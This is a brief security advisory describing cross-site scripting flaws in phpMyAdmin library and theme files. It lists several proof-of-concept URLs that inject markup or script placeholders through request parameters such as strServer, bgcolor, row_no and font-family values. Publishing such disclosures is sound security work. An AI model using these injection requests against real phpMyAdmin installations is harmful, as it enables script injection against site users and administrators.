|
|
PHPMyAdmin Multiple Libraries And Themes Remote Cross-Site Scripting Vulnerabilities
No exploit is required to leverage any of these issues. The following proof of concepts have been provided: http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code] http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code] http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code] http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code] http://www.example.com/phpMyAdmin/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS] http://www.example.com/phpMyAdmin/themes/original/css/theme_right.css.php?right_font_family=[XSS] |
|
Privacy Statement |